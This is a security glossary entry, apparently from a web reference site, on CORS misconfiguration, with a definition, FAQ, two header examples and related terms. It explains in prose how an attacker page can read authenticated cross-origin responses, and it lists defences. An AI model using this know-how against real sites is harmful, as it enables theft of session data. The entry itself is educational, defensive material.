CORS Misconfiguration
What is CORS Misconfiguration?
CORS MisconfigurationAn insecure CORS policy that allows untrusted origins to read authenticated responses, often by reflecting the Origin header and returning Access-Control-Allow-Credentials: true.
CORS misconfiguration occurs when a server implements Cross-Origin Resource Sharing in a way that effectively disables the same-origin policy. Common mistakes include reflecting any Origin in Access-Control-Allow-Origin, allowing 'null' origins, whitelisting wildcard subdomains, or combining Allow-Origin: * with Allow-Credentials: true (rejected by browsers but often misimplemented). An attacker hosts a page that issues authenticated cross-origin requests; because the response is now readable, sensitive data such as session tokens, account details, or API responses can be exfiltrated. Defenses include strict origin allow-lists, rejecting Origin reflection, and never combining credentials with broad wildcards.
● Examples
- 01
Server returns Access-Control-Allow-Origin: https://attacker.com when the request's Origin header is attacker.com.
- 02
API allows Access-Control-Allow-Origin: null which can be triggered from sandboxed iframes.
● Frequently asked questions
What is CORS Misconfiguration?
An insecure CORS policy that allows untrusted origins to read authenticated responses, often by reflecting the Origin header and returning Access-Control-Allow-Credentials: true. It belongs to the Attacks & Threats category of cybersecurity.
What does CORS Misconfiguration mean?
An insecure CORS policy that allows untrusted origins to read authenticated responses, often by reflecting the Origin header and returning Access-Control-Allow-Credentials: true.
How does CORS Misconfiguration work?
CORS misconfiguration occurs when a server implements Cross-Origin Resource Sharing in a way that effectively disables the same-origin policy. Common mistakes include reflecting any Origin in Access-Control-Allow-Origin, allowing 'null' origins, whitelisting wildcard subdomains, or combining Allow-Origin: * with Allow-Credentials: true (rejected by browsers but often misimplemented). An attacker hosts a page that issues authenticated cross-origin requests; because the response is now readable, sensitive data such as session tokens, account details, or API responses can be exfiltrated. Defenses include strict origin allow-lists, rejecting Origin reflection, and never combining credentials with broad wildcards.
How do you defend against CORS Misconfiguration?
Defences for CORS Misconfiguration typically combine technical controls and operational practices, as detailed in the full definition above.
What are other names for CORS Misconfiguration?
Common alternative names include: Permissive CORS.
● Related terms
- appsec№ 223
CORS (Cross-Origin Resource Sharing)
A browser-enforced mechanism that lets a server selectively relax the Same-Origin Policy so that JavaScript on one origin can read responses from another.
- appsec№ 960
Same-Origin Policy (SOP)
Browser security rule that restricts how a document or script loaded from one origin can interact with a resource from a different origin.
- attacks№ 240
Cross-Site Scripting (XSS)
A web vulnerability that allows attackers to inject malicious scripts into pages viewed by other users, executing in the victim's browser under the site's origin.
- attacks№ 239
Cross-Site Request Forgery (CSRF)
A web attack that forces an authenticated user's browser to send unwanted requests to a vulnerable site, causing state-changing actions without consent.
- appsec№ 961
SameSite Cookie
A cookie attribute that controls whether browsers attach the cookie on cross-site requests, with values Strict, Lax and None, used primarily to mitigate CSRF.
- attacks№ 1016
Session Hijacking
An attack that takes over a victim's authenticated session by stealing or forging the session identifier so the attacker can act as the user without their credentials.
● See also
- № 566JSONP Vulnerability